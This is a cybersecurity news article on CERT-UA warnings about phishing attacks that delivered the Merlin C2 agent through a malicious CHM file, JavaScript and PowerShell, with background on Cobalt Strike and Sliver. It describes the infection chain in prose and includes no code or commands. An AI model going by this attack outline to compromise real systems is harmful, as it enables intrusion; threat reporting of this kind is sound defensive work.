Ukraine's Cyber Defense Issues Warnings About 'Merlin' Attacks
Git Threat Actor Tools Exposed
Ray Tierney generated this image using Midjourney.
Cobalt Strike, released in 2012, exploded in popularity with threat actors as an attack tool for dropping ransomware on compromised networks with “beacons” that allow pivoting and lateral movement to high-value systems. Widespread use of Endpoint Detection and Response (EDR) and antivirus solutions have made It necessary for a change in tactics by the attackers.
Sliver is an open-source cross-platform adversary emulation/red team framework developed by researchers at BishopFox cybersecurity company. Microsoft noted in 2022 that hackers from state-sponsored groups to ransomware criminals were using the Go-based security testing tool in their attack campaigns.
Ukraine’s CERT-UA released recent reports warning of attacks targeting state organizations using 'Merlin’ another Cross-platform post-exploitation HTTP Command & Control agent written in golang (GO).
This Merlin Git repository is a port of the Merlin agent to run on the Mythic framework. This implementation uses Mythic's Default HTTP Command and Control profile. “Merlin” is available for free via GitHub for security professionals to use in red team exercises. It allows red teamers (and attackers) to obtain a foothold on a compromised network.
Merlin is a Go-based cross-platform post-exploitation toolkit Support for HTTP/1.1 over TLS and HTTP/3 (HTTP/2 over QUIC) for C2 communication.
CERT-UA reports that it detected Merlin in attacks that started with the arrival of a phishing email that impersonated the agency (sender address: [email protected]) and supposedly provided the recipients with instructions on how to harden their MS Office suite. The emails carry a CHM file attachment that, if opened, executes JavaScript code which in turn runs a PowerShell script that fetches, decrypts, and decompresses a GZIP archive that contains the executable "ctlhost.exe."
CHM files in Windows usually contain help documentation compiled and saved in a compressed HTML format. This may include text, images, and hyperlinks. A user can open a CHM file by double-clicking it and the CHM file will appear within Microsoft HTML Help Executable.
However, in the case of the malicious CHM file, when the executable is run, the computer gets infected by “MerlinAgent” and full access is obtained by the attackers to the machine, data, and with that, a foothold to move laterally in the network.